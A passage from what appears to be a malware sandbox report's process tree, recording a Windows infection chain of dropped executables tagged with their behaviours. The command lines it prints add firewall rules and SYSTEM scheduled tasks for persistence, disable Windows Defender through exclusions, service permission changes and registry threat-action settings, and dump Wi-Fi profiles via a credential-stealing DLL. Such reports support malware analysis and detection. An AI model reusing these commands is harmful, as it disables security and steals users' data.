  "C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5276
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 872
    3⤵
    - Program crash
    PID:5480
- C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
  "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
  2⤵
  PID:5692
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  - Loads dropped DLL
  PID:5948
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:5980
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:6120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\660967641992_Desktop.zip' -CompressionLevel Optimal
      4⤵
      PID:4440
- C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe
  "C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5364
- C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5796
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
    3⤵
    - Checks computer location settings
    PID:5956
  - - C:\Users\Admin\Pictures\HuFE6cgsWKFzm3uAJr97ze1v.exe
      "C:\Users\Admin\Pictures\HuFE6cgsWKFzm3uAJr97ze1v.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:5284
    - - C:\Users\Admin\AppData\Local\Temp\u42s.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u42s.0.exe"
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:6132
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KEBGHCBAEG.exe"
        6⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\KEBGHCBAEG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KEBGHCBAEG.exe"
        7⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KEBGHCBAEG.exe
        8⤵
        
        PID:744
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        9⤵
        Runs ping.exe
        
        PID:224
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 3332
        6⤵
        Program crash
        
        PID:2956
    - - C:\Users\Admin\AppData\Local\Temp\u42s.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u42s.1.exe"
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of SendNotifyMessage
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        6⤵
        
        PID:4304
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 1004
        5⤵
        Program crash
        
        PID:1424
  - - C:\Users\Admin\Pictures\g3ZTceA91pUXTsj4t2lBlweN.exe
      "C:\Users\Admin\Pictures\g3ZTceA91pUXTsj4t2lBlweN.exe"
      4⤵
      Executes dropped EXE
      PID:5944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2560
    - - C:\Users\Admin\Pictures\g3ZTceA91pUXTsj4t2lBlweN.exe
        
        "C:\Users\Admin\Pictures\g3ZTceA91pUXTsj4t2lBlweN.exe"
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:5852
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4460
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:4824
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5372
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3164
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5292
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1920
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 1012
        5⤵
        Program crash
        
        PID:4684
  - - C:\Users\Admin\Pictures\sNtoOhN5YbAquQ7j8Vio7RcY.exe
      "C:\Users\Admin\Pictures\sNtoOhN5YbAquQ7j8Vio7RcY.exe"
      4⤵
      Executes dropped EXE
      PID:6072
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5704
    - - C:\Users\Admin\Pictures\sNtoOhN5YbAquQ7j8Vio7RcY.exe
        
        "C:\Users\Admin\Pictures\sNtoOhN5YbAquQ7j8Vio7RcY.exe"
        5⤵
        Executes dropped EXE
        
        PID:5984
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Modifies data under HKEY_USERS
        
        PID:5904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:3344
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:5668
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:2176
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:720
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5408
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:3164
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        
        PID:5080
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5084
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        
        PID:1424
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Launches sc.exe
        
        PID:3308
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 756
        5⤵
        Program crash
        
        PID:5752
  - - C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe
      "C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      PID:3272
    - - C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe
        
        C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x6b58e1d0,0x6b58e1dc,0x6b58e1e8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3504
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zqpmw8ehQbfUaKbSiWpjFTXC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zqpmw8ehQbfUaKbSiWpjFTXC.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2912
    - - C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe
        
        "C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3272 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409224426" --session-guid=bee6840d-0e97-456e-9f2e-14bb1171554d --server-tracking-blob="MzIzNWM5Y2UxODZmYmQzZDdhMDJjNDk4ODMxZTllNTljYzYzYjU1ZDBjNTFkZTI4OGE3ODBjNDM0ZmFhZjJhZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEyNzAyNjU4LjAzOTIiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNzMxZDQyYTItYTYwNS00YzRkLWIxNzgtODRiOGM0YTljMGMyIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0005000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        
        PID:1412
      - C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe
        
        C:\Users\Admin\Pictures\zqpmw8ehQbfUaKbSiWpjFTXC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x6aa8e1d0,0x6aa8e1dc,0x6aa8e1e8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3500
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        5⤵
        
        PID:3336
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:4780
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092244261\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x270,0x274,0x278,0x244,0x27c,0xf70040,0xf7004c,0xf70058
        6⤵
        
        PID:5976
  - - C:\Users\Admin\Pictures\s2sXXUlqusSNBDWzK7CGnwUt.exe
      "C:\Users\Admin\Pictures\s2sXXUlqusSNBDWzK7CGnwUt.exe"
      4⤵
      Executes dropped EXE
      PID:5792
    - - C:\Users\Admin\AppData\Local\Temp\7zSB2C1.tmp\Install.exe
        
        .\Install.exe /tZwvdidFkPtt "385118" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5772
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:5584
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 22:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\iVDsfHv.exe\" my /LIsite_idSHp 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5148
  - - C:\Users\Admin\Pictures\yDECol5ophMq6V7pbbaY2iaj.exe
      "C:\Users\Admin\Pictures\yDECol5ophMq6V7pbbaY2iaj.exe"
      4⤵
      Modifies firewall policy service
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in System32 directory
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:700
  - - C:\Users\Admin\Pictures\KdVOnaSad0K1ZRkEZpX1Ebcn.exe
      "C:\Users\Admin\Pictures\KdVOnaSad0K1ZRkEZpX1Ebcn.exe"
      4⤵
      Executes dropped EXE
      PID:5256
    - - C:\Users\Admin\AppData\Local\Temp\7zSBC65.tmp\Install.exe
        
        .\Install.exe /tZwvdidFkPtt "385118" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5268
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:5180
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 22:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\dQHCTbK.exe\" my /tEsite_idDYd 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
    3⤵
    PID:5996
- C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe
  "C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe"
  2⤵
  - Executes dropped EXE
  PID:5964
- C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5660
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5820
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5392
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    PID:5464
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:3528

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2812 -ip 2812
1⤵
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5276 -ip 5276
1⤵
PID:5416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5284 -ip 5284
1⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6072 -ip 6072
1⤵
PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5944 -ip 5944
1⤵
PID:5904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k smphost
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6132 -ip 6132
1⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\dQHCTbK.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\dQHCTbK.exe my /tEsite_idDYd 385118 /S
1⤵
PID:4580
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:5884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5648
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6100
- - C:\Windows\SysWOW64\reg.exe
